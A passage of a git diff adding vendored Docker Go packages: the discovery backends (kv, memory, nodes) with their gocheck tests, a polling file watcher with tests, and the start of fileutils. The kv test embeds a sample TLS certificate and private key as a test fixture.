+ errCh <- fmt.Errorf("Unexpected watch error") + time.Sleep(s.heartbeat) + } + }() + return ch, errCh +} + +// Register is exported +func (s *Discovery) Register(addr string) error { + opts := &store.WriteOptions{TTL: s.ttl} + return s.store.Put(path.Join(s.path, addr), []byte(addr), opts) +} + +// Store returns the underlying store used by KV discovery. +func (s *Discovery) Store() store.Store { + return s.store +} + +// Prefix returns the store prefix +func (s *Discovery) Prefix() string { + return s.prefix +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go b/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go new file mode 100644 index 0000000000..dab3939dd0 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go @@ -0,0 +1,324 @@ +package kv + +import ( + "errors" + "io/ioutil" + "os" + "path" + "testing" + "time" + + "github.com/docker/docker/pkg/discovery" + "github.com/docker/libkv" + "github.com/docker/libkv/store" + + "github.com/go-check/check" +) + +// Hook up gocheck into the "go test" runner. 
+func Test(t *testing.T) { check.TestingT(t) } + +type DiscoverySuite struct{} + +var _ = check.Suite(&DiscoverySuite{}) + +func (ds *DiscoverySuite) TestInitialize(c *check.C) { + storeMock := &FakeStore{ + Endpoints: []string{"127.0.0.1"}, + } + d := &Discovery{backend: store.CONSUL} + d.Initialize("127.0.0.1", 0, 0, nil) + d.store = storeMock + + s := d.store.(*FakeStore) + c.Assert(s.Endpoints, check.HasLen, 1) + c.Assert(s.Endpoints[0], check.Equals, "127.0.0.1") + c.Assert(d.path, check.Equals, defaultDiscoveryPath) + + storeMock = &FakeStore{ + Endpoints: []string{"127.0.0.1:1234"}, + } + d = &Discovery{backend: store.CONSUL} + d.Initialize("127.0.0.1:1234/path", 0, 0, nil) + d.store = storeMock + + s = d.store.(*FakeStore) + c.Assert(s.Endpoints, check.HasLen, 1) + c.Assert(s.Endpoints[0], check.Equals, "127.0.0.1:1234") + c.Assert(d.path, check.Equals, "path/"+defaultDiscoveryPath) + + storeMock = &FakeStore{ + Endpoints: []string{"127.0.0.1:1234", "127.0.0.2:1234", "127.0.0.3:1234"}, + } + d = &Discovery{backend: store.CONSUL} + d.Initialize("127.0.0.1:1234,127.0.0.2:1234,127.0.0.3:1234/path", 0, 0, nil) + d.store = storeMock + + s = d.store.(*FakeStore) + c.Assert(s.Endpoints, check.HasLen, 3) + c.Assert(s.Endpoints[0], check.Equals, "127.0.0.1:1234") + c.Assert(s.Endpoints[1], check.Equals, "127.0.0.2:1234") + c.Assert(s.Endpoints[2], check.Equals, "127.0.0.3:1234") + + c.Assert(d.path, check.Equals, "path/"+defaultDiscoveryPath) +} + +// Extremely limited mock store so we can test initialization +type Mock struct { + // Endpoints passed to InitializeMock + Endpoints []string + + // Options passed to InitializeMock + Options *store.Config +} + +func NewMock(endpoints []string, options *store.Config) (store.Store, error) { + s := &Mock{} + s.Endpoints = endpoints + s.Options = options + return s, nil +} +func (s *Mock) Put(key string, value []byte, opts *store.WriteOptions) error { + return errors.New("Put not supported") +} +func (s *Mock) Get(key 
string) (*store.KVPair, error) { + return nil, errors.New("Get not supported") +} +func (s *Mock) Delete(key string) error { + return errors.New("Delete not supported") +} + +// Exists mock +func (s *Mock) Exists(key string) (bool, error) { + return false, errors.New("Exists not supported") +} + +// Watch mock +func (s *Mock) Watch(key string, stopCh <-chan struct{}) (<-chan *store.KVPair, error) { + return nil, errors.New("Watch not supported") +} + +// WatchTree mock +func (s *Mock) WatchTree(prefix string, stopCh <-chan struct{}) (<-chan []*store.KVPair, error) { + return nil, errors.New("WatchTree not supported") +} + +// NewLock mock +func (s *Mock) NewLock(key string, options *store.LockOptions) (store.Locker, error) { + return nil, errors.New("NewLock not supported") +} + +// List mock +func (s *Mock) List(prefix string) ([]*store.KVPair, error) { + return nil, errors.New("List not supported") +} + +// DeleteTree mock +func (s *Mock) DeleteTree(prefix string) error { + return errors.New("DeleteTree not supported") +} + +// AtomicPut mock +func (s *Mock) AtomicPut(key string, value []byte, previous *store.KVPair, opts *store.WriteOptions) (bool, *store.KVPair, error) { + return false, nil, errors.New("AtomicPut not supported") +} + +// AtomicDelete mock +func (s *Mock) AtomicDelete(key string, previous *store.KVPair) (bool, error) { + return false, errors.New("AtomicDelete not supported") +} + +// Close mock +func (s *Mock) Close() { + return +} + +func (ds *DiscoverySuite) TestInitializeWithCerts(c *check.C) { + cert := `-----BEGIN CERTIFICATE----- +MIIDCDCCAfKgAwIBAgIICifG7YeiQOEwCwYJKoZIhvcNAQELMBIxEDAOBgNVBAMT +B1Rlc3QgQ0EwHhcNMTUxMDAxMjMwMDAwWhcNMjAwOTI5MjMwMDAwWjASMRAwDgYD +VQQDEwdUZXN0IENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1wRC +O+flnLTK5ImjTurNRHwSejuqGbc4CAvpB0hS+z0QlSs4+zE9h80aC4hz+6caRpds ++J908Q+RvAittMHbpc7VjbZP72G6fiXk7yPPl6C10HhRSoSi3nY+B7F2E8cuz14q +V2e+ejhWhSrBb/keyXpcyjoW1BOAAJ2TIclRRkICSCZrpXUyXxAvzXfpFXo1RhSb 
+UywN11pfiCQzDUN7sPww9UzFHuAHZHoyfTr27XnJYVUerVYrCPq8vqfn//01qz55 +Xs0hvzGdlTFXhuabFtQnKFH5SNwo/fcznhB7rePOwHojxOpXTBepUCIJLbtNnWFT +V44t9gh5IqIWtoBReQIDAQABo2YwZDAOBgNVHQ8BAf8EBAMCAAYwEgYDVR0TAQH/ +BAgwBgEB/wIBAjAdBgNVHQ4EFgQUZKUI8IIjIww7X/6hvwggQK4bD24wHwYDVR0j +BBgwFoAUZKUI8IIjIww7X/6hvwggQK4bD24wCwYJKoZIhvcNAQELA4IBAQDES2cz +7sCQfDCxCIWH7X8kpi/JWExzUyQEJ0rBzN1m3/x8ySRxtXyGekimBqQwQdFqlwMI +xzAQKkh3ue8tNSzRbwqMSyH14N1KrSxYS9e9szJHfUasoTpQGPmDmGIoRJuq1h6M +ej5x1SCJ7GWCR6xEXKUIE9OftXm9TdFzWa7Ja3OHz/mXteii8VXDuZ5ACq6EE5bY +8sP4gcICfJ5fTrpTlk9FIqEWWQrCGa5wk95PGEj+GJpNogjXQ97wVoo/Y3p1brEn +t5zjN9PAq4H1fuCMdNNA+p1DHNwd+ELTxcMAnb2ajwHvV6lKPXutrTFc4umJToBX +FpTxDmJHEV4bzUzh +-----END CERTIFICATE----- +` + key := `-----BEGIN RSA PRIVATE KEY----- +MIIEpQIBAAKCAQEA1wRCO+flnLTK5ImjTurNRHwSejuqGbc4CAvpB0hS+z0QlSs4 ++zE9h80aC4hz+6caRpds+J908Q+RvAittMHbpc7VjbZP72G6fiXk7yPPl6C10HhR +SoSi3nY+B7F2E8cuz14qV2e+ejhWhSrBb/keyXpcyjoW1BOAAJ2TIclRRkICSCZr +pXUyXxAvzXfpFXo1RhSbUywN11pfiCQzDUN7sPww9UzFHuAHZHoyfTr27XnJYVUe +rVYrCPq8vqfn//01qz55Xs0hvzGdlTFXhuabFtQnKFH5SNwo/fcznhB7rePOwHoj +xOpXTBepUCIJLbtNnWFTV44t9gh5IqIWtoBReQIDAQABAoIBAHSWipORGp/uKFXj +i/mut776x8ofsAxhnLBARQr93ID+i49W8H7EJGkOfaDjTICYC1dbpGrri61qk8sx +qX7p3v/5NzKwOIfEpirgwVIqSNYe/ncbxnhxkx6tXtUtFKmEx40JskvSpSYAhmmO +1XSx0E/PWaEN/nLgX/f1eWJIlxlQkk3QeqL+FGbCXI48DEtlJ9+MzMu4pAwZTpj5 +5qtXo5JJ0jRGfJVPAOznRsYqv864AhMdMIWguzk6EGnbaCWwPcfcn+h9a5LMdony +MDHfBS7bb5tkF3+AfnVY3IBMVx7YlsD9eAyajlgiKu4zLbwTRHjXgShy+4Oussz0 +ugNGnkECgYEA/hi+McrZC8C4gg6XqK8+9joD8tnyDZDz88BQB7CZqABUSwvjDqlP +L8hcwo/lzvjBNYGkqaFPUICGWKjeCtd8pPS2DCVXxDQX4aHF1vUur0uYNncJiV3N +XQz4Iemsa6wnKf6M67b5vMXICw7dw0HZCdIHD1hnhdtDz0uVpeevLZ8CgYEA2KCT +Y43lorjrbCgMqtlefkr3GJA9dey+hTzCiWEOOqn9RqGoEGUday0sKhiLofOgmN2B +LEukpKIey8s+Q/cb6lReajDVPDsMweX8i7hz3Wa4Ugp4Xa5BpHqu8qIAE2JUZ7bU +t88aQAYE58pUF+/Lq1QzAQdrjjzQBx6SrBxieecCgYEAvukoPZEC8mmiN1VvbTX+ +QFHmlZha3QaDxChB+QUe7bMRojEUL/fVnzkTOLuVFqSfxevaI/km9n0ac5KtAchV 
+xjp2bTnBb5EUQFqjopYktWA+xO07JRJtMfSEmjZPbbay1kKC7rdTfBm961EIHaRj +xZUf6M+rOE8964oGrdgdLlECgYEA046GQmx6fh7/82FtdZDRQp9tj3SWQUtSiQZc +qhO59Lq8mjUXz+MgBuJXxkiwXRpzlbaFB0Bca1fUoYw8o915SrDYf/Zu2OKGQ/qa +V81sgiVmDuEgycR7YOlbX6OsVUHrUlpwhY3hgfMe6UtkMvhBvHF/WhroBEIJm1pV +PXZ/CbMCgYEApNWVktFBjOaYfY6SNn4iSts1jgsQbbpglg3kT7PLKjCAhI6lNsbk +dyT7ut01PL6RaW4SeQWtrJIVQaM6vF3pprMKqlc5XihOGAmVqH7rQx9rtQB5TicL +BFrwkQE4HQtQBV60hYQUzzlSk44VFDz+jxIEtacRHaomDRh2FtOTz+I= +-----END RSA PRIVATE KEY----- +` + certFile, err := ioutil.TempFile("", "cert") + c.Assert(err, check.IsNil) + defer os.Remove(certFile.Name()) + certFile.Write([]byte(cert)) + certFile.Close() + keyFile, err := ioutil.TempFile("", "key") + c.Assert(err, check.IsNil) + defer os.Remove(keyFile.Name()) + keyFile.Write([]byte(key)) + keyFile.Close() + + libkv.AddStore("mock", NewMock) + d := &Discovery{backend: "mock"} + err = d.Initialize("127.0.0.3:1234", 0, 0, map[string]string{ + "kv.cacertfile": certFile.Name(), + "kv.certfile": certFile.Name(), + "kv.keyfile": keyFile.Name(), + }) + c.Assert(err, check.IsNil) + s := d.store.(*Mock) + c.Assert(s.Options.TLS, check.NotNil) + c.Assert(s.Options.TLS.RootCAs, check.NotNil) + c.Assert(s.Options.TLS.Certificates, check.HasLen, 1) +} + +func (ds *DiscoverySuite) TestWatch(c *check.C) { + mockCh := make(chan []*store.KVPair) + + storeMock := &FakeStore{ + Endpoints: []string{"127.0.0.1:1234"}, + mockKVChan: mockCh, + } + + d := &Discovery{backend: store.CONSUL} + d.Initialize("127.0.0.1:1234/path", 0, 0, nil) + d.store = storeMock + + expected := discovery.Entries{ + &discovery.Entry{Host: "1.1.1.1", Port: "1111"}, + &discovery.Entry{Host: "2.2.2.2", Port: "2222"}, + } + kvs := []*store.KVPair{ + {Key: path.Join("path", defaultDiscoveryPath, "1.1.1.1"), Value: []byte("1.1.1.1:1111")}, + {Key: path.Join("path", defaultDiscoveryPath, "2.2.2.2"), Value: []byte("2.2.2.2:2222")}, + } + + stopCh := make(chan struct{}) + ch, errCh := d.Watch(stopCh) + + // It should fire an error 
since the first WatchTree call failed. + c.Assert(<-errCh, check.ErrorMatches, "test error") + // We have to drain the error channel otherwise Watch will get stuck. + go func() { + for range errCh { + } + }() + + // Push the entries into the store channel and make sure discovery emits. + mockCh <- kvs + c.Assert(<-ch, check.DeepEquals, expected) + + // Add a new entry. + expected = append(expected, &discovery.Entry{Host: "3.3.3.3", Port: "3333"}) + kvs = append(kvs, &store.KVPair{Key: path.Join("path", defaultDiscoveryPath, "3.3.3.3"), Value: []byte("3.3.3.3:3333")}) + mockCh <- kvs + c.Assert(<-ch, check.DeepEquals, expected) + + close(mockCh) + // Give it enough time to call WatchTree. + time.Sleep(3 * time.Second) + + // Stop and make sure it closes all channels. + close(stopCh) + c.Assert(<-ch, check.IsNil) + c.Assert(<-errCh, check.IsNil) +} + +// FakeStore implements store.Store methods. It mocks all store +// function in a simple, naive way. +type FakeStore struct { + Endpoints []string + Options *store.Config + mockKVChan <-chan []*store.KVPair + + watchTreeCallCount int +} + +func (s *FakeStore) Put(key string, value []byte, options *store.WriteOptions) error { + return nil +} + +func (s *FakeStore) Get(key string) (*store.KVPair, error) { + return nil, nil +} + +func (s *FakeStore) Delete(key string) error { + return nil +} + +func (s *FakeStore) Exists(key string) (bool, error) { + return true, nil +} + +func (s *FakeStore) Watch(key string, stopCh <-chan struct{}) (<-chan *store.KVPair, error) { + return nil, nil +} + +// WatchTree will fail the first time, and return the mockKVchan afterwards. +// This is the behavior we need for testing.. If we need 'moar', should update this. 
+func (s *FakeStore) WatchTree(directory string, stopCh <-chan struct{}) (<-chan []*store.KVPair, error) { + if s.watchTreeCallCount == 0 { + s.watchTreeCallCount = 1 + return nil, errors.New("test error") + } + // First calls error + return s.mockKVChan, nil +} + +func (s *FakeStore) NewLock(key string, options *store.LockOptions) (store.Locker, error) { + return nil, nil +} + +func (s *FakeStore) List(directory string) ([]*store.KVPair, error) { + return []*store.KVPair{}, nil +} + +func (s *FakeStore) DeleteTree(directory string) error { + return nil +} + +func (s *FakeStore) AtomicPut(key string, value []byte, previous *store.KVPair, options *store.WriteOptions) (bool, *store.KVPair, error) { + return true, nil, nil +} + +func (s *FakeStore) AtomicDelete(key string, previous *store.KVPair) (bool, error) { + return true, nil +} + +func (s *FakeStore) Close() { +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go b/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go new file mode 100644 index 0000000000..ba8b1f55f3 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go @@ -0,0 +1,93 @@ +package memory + +import ( + "sync" + "time" + + "github.com/docker/docker/pkg/discovery" +) + +// Discovery implements a discovery backend that keeps +// data in memory. +type Discovery struct { + heartbeat time.Duration + values []string + mu sync.Mutex +} + +func init() { + Init() +} + +// Init registers the memory backend on demand. +func Init() { + discovery.Register("memory", &Discovery{}) +} + +// Initialize sets the heartbeat for the memory backend. +func (s *Discovery) Initialize(_ string, heartbeat time.Duration, _ time.Duration, _ map[string]string) error { + s.heartbeat = heartbeat + s.values = make([]string, 0) + return nil +} + +// Watch sends periodic discovery updates to a channel. 
+func (s *Discovery) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) { + ch := make(chan discovery.Entries) + errCh := make(chan error) + ticker := time.NewTicker(s.heartbeat) + + go func() { + defer close(errCh) + defer close(ch) + + // Send the initial entries if available. + var currentEntries discovery.Entries + var err error + + s.mu.Lock() + if len(s.values) > 0 { + currentEntries, err = discovery.CreateEntries(s.values) + } + s.mu.Unlock() + + if err != nil { + errCh <- err + } else if currentEntries != nil { + ch <- currentEntries + } + + // Periodically send updates. + for { + select { + case <-ticker.C: + s.mu.Lock() + newEntries, err := discovery.CreateEntries(s.values) + s.mu.Unlock() + if err != nil { + errCh <- err + continue + } + + // Check if the file has really changed. + if !newEntries.Equals(currentEntries) { + ch <- newEntries + } + currentEntries = newEntries + case <-stopCh: + ticker.Stop() + return + } + } + }() + + return ch, errCh +} + +// Register adds a new address to the discovery. +func (s *Discovery) Register(addr string) error { + s.mu.Lock() + s.values = append(s.values, addr) + s.mu.Unlock() + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go b/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go new file mode 100644 index 0000000000..c2da0a068e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go @@ -0,0 +1,48 @@ +package memory + +import ( + "testing" + + "github.com/docker/docker/pkg/discovery" + "github.com/go-check/check" +) + +// Hook up gocheck into the "go test" runner. 
+func Test(t *testing.T) { check.TestingT(t) } + +type discoverySuite struct{} + +var _ = check.Suite(&discoverySuite{}) + +func (s *discoverySuite) TestWatch(c *check.C) { + d := &Discovery{} + d.Initialize("foo", 1000, 0, nil) + stopCh := make(chan struct{}) + ch, errCh := d.Watch(stopCh) + + // We have to drain the error channel otherwise Watch will get stuck. + go func() { + for range errCh { + } + }() + + expected := discovery.Entries{ + &discovery.Entry{Host: "1.1.1.1", Port: "1111"}, + } + + c.Assert(d.Register("1.1.1.1:1111"), check.IsNil) + c.Assert(<-ch, check.DeepEquals, expected) + + expected = discovery.Entries{ + &discovery.Entry{Host: "1.1.1.1", Port: "1111"}, + &discovery.Entry{Host: "2.2.2.2", Port: "2222"}, + } + + c.Assert(d.Register("2.2.2.2:2222"), check.IsNil) + c.Assert(<-ch, check.DeepEquals, expected) + + // Stop and make sure it closes all channels. + close(stopCh) + c.Assert(<-ch, check.IsNil) + c.Assert(<-errCh, check.IsNil) +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go new file mode 100644 index 0000000000..c0e3c07b22 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go @@ -0,0 +1,54 @@ +package nodes + +import ( + "fmt" + "strings" + "time" + + "github.com/docker/docker/pkg/discovery" +) + +// Discovery is exported +type Discovery struct { + entries discovery.Entries +} + +func init() { + Init() +} + +// Init is exported +func Init() { + discovery.Register("nodes", &Discovery{}) +} + +// Initialize is exported +func (s *Discovery) Initialize(uris string, _ time.Duration, _ time.Duration, _ map[string]string) error { + for _, input := range strings.Split(uris, ",") { + for _, ip := range discovery.Generate(input) { + entry, err := discovery.NewEntry(ip) + if err != nil { + return fmt.Errorf("%s, please check you are using the correct discovery (missing token:// ?)", err.Error()) + } + s.entries = append(s.entries, 
entry) + } + } + + return nil +} + +// Watch is exported +func (s *Discovery) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) { + ch := make(chan discovery.Entries) + go func() { + defer close(ch) + ch <- s.entries + <-stopCh + }() + return ch, nil +} + +// Register is exported +func (s *Discovery) Register(addr string) error { + return discovery.ErrNotImplemented +} diff --git a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go new file mode 100644 index 0000000000..e26568cf54 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go @@ -0,0 +1,51 @@ +package nodes + +import ( + "testing" + + "github.com/docker/docker/pkg/discovery" + + "github.com/go-check/check" +) + +// Hook up gocheck into the "go test" runner. +func Test(t *testing.T) { check.TestingT(t) } + +type DiscoverySuite struct{} + +var _ = check.Suite(&DiscoverySuite{}) + +func (s *DiscoverySuite) TestInitialize(c *check.C) { + d := &Discovery{} + d.Initialize("1.1.1.1:1111,2.2.2.2:2222", 0, 0, nil) + c.Assert(len(d.entries), check.Equals, 2) + c.Assert(d.entries[0].String(), check.Equals, "1.1.1.1:1111") + c.Assert(d.entries[1].String(), check.Equals, "2.2.2.2:2222") +} + +func (s *DiscoverySuite) TestInitializeWithPattern(c *check.C) { + d := &Discovery{} + d.Initialize("1.1.1.[1:2]:1111,2.2.2.[2:4]:2222", 0, 0, nil) + c.Assert(len(d.entries), check.Equals, 5) + c.Assert(d.entries[0].String(), check.Equals, "1.1.1.1:1111") + c.Assert(d.entries[1].String(), check.Equals, "1.1.1.2:1111") + c.Assert(d.entries[2].String(), check.Equals, "2.2.2.2:2222") + c.Assert(d.entries[3].String(), check.Equals, "2.2.2.3:2222") + c.Assert(d.entries[4].String(), check.Equals, "2.2.2.4:2222") +} + +func (s *DiscoverySuite) TestWatch(c *check.C) { + d := &Discovery{} + d.Initialize("1.1.1.1:1111,2.2.2.2:2222", 0, 0, nil) + expected := discovery.Entries{ + &discovery.Entry{Host: 
"1.1.1.1", Port: "1111"}, + &discovery.Entry{Host: "2.2.2.2", Port: "2222"}, + } + ch, _ := d.Watch(nil) + c.Assert(expected.Equals(<-ch), check.Equals, true) +} + +func (s *DiscoverySuite) TestRegister(c *check.C) { + d := &Discovery{} + c.Assert(d.Register("0.0.0.0"), check.NotNil) +} diff --git a/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go b/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go new file mode 100644 index 0000000000..7a81cbda95 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go @@ -0,0 +1,40 @@ +// Package filenotify provides a mechanism for watching file(s) for changes. +// Generally leans on fsnotify, but provides a poll-based notifier which fsnotify does not support. +// These are wrapped up in a common interface so that either can be used interchangeably in your code. +package filenotify + +import "github.com/fsnotify/fsnotify" + +// FileWatcher is an interface for implementing file notification watchers +type FileWatcher interface { + Events() <-chan fsnotify.Event + Errors() <-chan error + Add(name string) error + Remove(name string) error + Close() error +} + +// New tries to use an fs-event watcher, and falls back to the poller if there is an error +func New() (FileWatcher, error) { + if watcher, err := NewEventWatcher(); err == nil { + return watcher, nil + } + return NewPollingWatcher(), nil +} + +// NewPollingWatcher returns a poll-based file watcher +func NewPollingWatcher() FileWatcher { + return &filePoller{ + events: make(chan fsnotify.Event), + errors: make(chan error), + } +} + +// NewEventWatcher returns an fs-event based file watcher +func NewEventWatcher() (FileWatcher, error) { + watcher, err := fsnotify.NewWatcher() + if err != nil { + return nil, err + } + return &fsNotifyWatcher{watcher}, nil +} diff --git a/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go b/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go new file mode 100644 index 
0000000000..5d08a997a0 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go @@ -0,0 +1,18 @@ +package filenotify + +import "github.com/fsnotify/fsnotify" + +// fsNotifyWatcher wraps the fsnotify package to satisfy the FileNotifer interface +type fsNotifyWatcher struct { + *fsnotify.Watcher +} + +// Events returns the fsnotify event channel receiver +func (w *fsNotifyWatcher) Events() <-chan fsnotify.Event { + return w.Watcher.Events +} + +// Errors returns the fsnotify error channel receiver +func (w *fsNotifyWatcher) Errors() <-chan error { + return w.Watcher.Errors +} diff --git a/vendor/github.com/docker/docker/pkg/filenotify/poller.go b/vendor/github.com/docker/docker/pkg/filenotify/poller.go new file mode 100644 index 0000000000..dc5ccd0f7f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/filenotify/poller.go @@ -0,0 +1,204 @@ +package filenotify + +import ( + "errors" + "fmt" + "os" + "sync" + "time" + + "github.com/Sirupsen/logrus" + + "github.com/fsnotify/fsnotify" +) + +var ( + // errPollerClosed is returned when the poller is closed + errPollerClosed = errors.New("poller is closed") + // errNoSuchPoller is returned when trying to remove a watch that doesn't exist + errNoSuchWatch = errors.New("poller does not exist") +) + +// watchWaitTime is the time to wait between file poll loops +const watchWaitTime = 200 * time.Millisecond + +// filePoller is used to poll files for changes, especially in cases where fsnotify +// can't be run (e.g. 
when inotify handles are exhausted) +// filePoller satisfies the FileWatcher interface +type filePoller struct { + // watches is the list of files currently being polled, close the associated channel to stop the watch + watches map[string]chan struct{} + // events is the channel to listen to for watch events + events chan fsnotify.Event + // errors is the channel to listen to for watch errors + errors chan error + // mu locks the poller for modification + mu sync.Mutex + // closed is used to specify when the poller has already closed + closed bool +} + +// Add adds a filename to the list of watches +// once added the file is polled for changes in a separate goroutine +func (w *filePoller) Add(name string) error { + w.mu.Lock() + defer w.mu.Unlock() + + if w.closed == true { + return errPollerClosed + } + + f, err := os.Open(name) + if err != nil { + return err + } + fi, err := os.Stat(name) + if err != nil { + return err + } + + if w.watches == nil { + w.watches = make(map[string]chan struct{}) + } + if _, exists := w.watches[name]; exists { + return fmt.Errorf("watch exists") + } + chClose := make(chan struct{}) + w.watches[name] = chClose + + go w.watch(f, fi, chClose) + return nil +} + +// Remove stops and removes watch with the specified name +func (w *filePoller) Remove(name string) error { + w.mu.Lock() + defer w.mu.Unlock() + return w.remove(name) +} + +func (w *filePoller) remove(name string) error { + if w.closed == true { + return errPollerClosed + } + + chClose, exists := w.watches[name] + if !exists { + return errNoSuchWatch + } + close(chClose) + delete(w.watches, name) + return nil +} + +// Events returns the event channel +// This is used for notifications on events about watched files +func (w *filePoller) Events() <-chan fsnotify.Event { + return w.events +} + +// Errors returns the errors channel +// This is used for notifications about errors on watched files +func (w *filePoller) Errors() <-chan error { + return w.errors +} + +// Close closes 
the poller +// All watches are stopped, removed, and the poller cannot be added to +func (w *filePoller) Close() error { + w.mu.Lock() + defer w.mu.Unlock() + + if w.closed { + return nil + } + + w.closed = true + for name := range w.watches { + w.remove(name) + delete(w.watches, name) + } + return nil +} + +// sendEvent publishes the specified event to the events channel +func (w *filePoller) sendEvent(e fsnotify.Event, chClose <-chan struct{}) error { + select { + case w.events <- e: + case <-chClose: + return fmt.Errorf("closed") + } + return nil +} + +// sendErr publishes the specified error to the errors channel +func (w *filePoller) sendErr(e error, chClose <-chan struct{}) error { + select { + case w.errors <- e: + case <-chClose: + return fmt.Errorf("closed") + } + return nil +} + +// watch is responsible for polling the specified file for changes +// upon finding changes to a file or errors, sendEvent/sendErr is called +func (w *filePoller) watch(f *os.File, lastFi os.FileInfo, chClose chan struct{}) { + defer f.Close() + for { + time.Sleep(watchWaitTime) + select { + case <-chClose: + logrus.Debugf("watch for %s closed", f.Name()) + return + default: + } + + fi, err := os.Stat(f.Name()) + if err != nil { + // if we got an error here and lastFi is not set, we can presume that nothing has changed + // This should be safe since before `watch()` is called, a stat is performed, there is any error `watch` is not called + if lastFi == nil { + continue + } + // If it doesn't exist at this point, it must have been removed + // no need to send the error here since this is a valid operation + if os.IsNotExist(err) { + if err := w.sendEvent(fsnotify.Event{Op: fsnotify.Remove, Name: f.Name()}, chClose); err != nil { + return + } + lastFi = nil + continue + } + // at this point, send the error + if err := w.sendErr(err, chClose); err != nil { + return + } + continue + } + + if lastFi == nil { + if err := w.sendEvent(fsnotify.Event{Op: fsnotify.Create, Name: fi.Name()}, 
chClose); err != nil { + return + } + lastFi = fi + continue + } + + if fi.Mode() != lastFi.Mode() { + if err := w.sendEvent(fsnotify.Event{Op: fsnotify.Chmod, Name: fi.Name()}, chClose); err != nil { + return + } + lastFi = fi + continue + } + + if fi.ModTime() != lastFi.ModTime() || fi.Size() != lastFi.Size() { + if err := w.sendEvent(fsnotify.Event{Op: fsnotify.Write, Name: fi.Name()}, chClose); err != nil { + return + } + lastFi = fi + continue + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go b/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go new file mode 100644 index 0000000000..b4c7825112 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go @@ -0,0 +1,119 @@ +package filenotify + +import ( + "fmt" + "io/ioutil" + "os" + "runtime" + "testing" + "time" + + "github.com/fsnotify/fsnotify" +) + +func TestPollerAddRemove(t *testing.T) { + w := NewPollingWatcher() + + if err := w.Add("no-such-file"); err == nil { + t.Fatal("should have gotten error when adding a non-existent file") + } + if err := w.Remove("no-such-file"); err == nil { + t.Fatal("should have gotten error when removing non-existent watch") + } + + f, err := ioutil.TempFile("", "asdf") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(f.Name()) + + if err := w.Add(f.Name()); err != nil { + t.Fatal(err) + } + + if err := w.Remove(f.Name()); err != nil { + t.Fatal(err) + } +} + +func TestPollerEvent(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("No chmod on Windows") + } + w := NewPollingWatcher() + + f, err := ioutil.TempFile("", "test-poller") + if err != nil { + t.Fatal("error creating temp file") + } + defer os.RemoveAll(f.Name()) + f.Close() + + if err := w.Add(f.Name()); err != nil { + t.Fatal(err) + } + + select { + case <-w.Events(): + t.Fatal("got event before anything happened") + case <-w.Errors(): + t.Fatal("got error before anything happened") + default: + } + + if err := 
ioutil.WriteFile(f.Name(), []byte("hello"), 644); err != nil { + t.Fatal(err) + } + if err := assertEvent(w, fsnotify.Write); err != nil { + t.Fatal(err) + } + + if err := os.Chmod(f.Name(), 600); err != nil { + t.Fatal(err) + } + if err := assertEvent(w, fsnotify.Chmod); err != nil { + t.Fatal(err) + } + + if err := os.Remove(f.Name()); err != nil { + t.Fatal(err) + } + if err := assertEvent(w, fsnotify.Remove); err != nil { + t.Fatal(err) + } +} + +func TestPollerClose(t *testing.T) { + w := NewPollingWatcher() + if err := w.Close(); err != nil { + t.Fatal(err) + } + // test double-close + if err := w.Close(); err != nil { + t.Fatal(err) + } + + f, err := ioutil.TempFile("", "asdf") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(f.Name()) + if err := w.Add(f.Name()); err == nil { + t.Fatal("should have gotten error adding watch for closed watcher") + } +} + +func assertEvent(w FileWatcher, eType fsnotify.Op) error { + var err error + select { + case e := <-w.Events(): + if e.Op != eType { + err = fmt.Errorf("got wrong event type, expected %q: %v", eType, e) + } + case e := <-w.Errors(): + err = fmt.Errorf("got unexpected error waiting for events %v: %v", eType, e) + case <-time.After(watchWaitTime * 3): + err = fmt.Errorf("timeout waiting for event %v", eType) + } + return err +} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go new file mode 100644 index 0000000000..c63ae75ce8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go @@ -0,0 +1,283 @@ +package fileutils + +import ( + "errors" + "fmt" + "io" + "os" + "path/filepath" + "regexp" + "strings" + "text/scanner" + + "github.com/Sirupsen/logrus" +) + +// exclusion returns true if the specified pattern is an exclusion +func exclusion(pattern string) bool { + return pattern[0] == '!' 
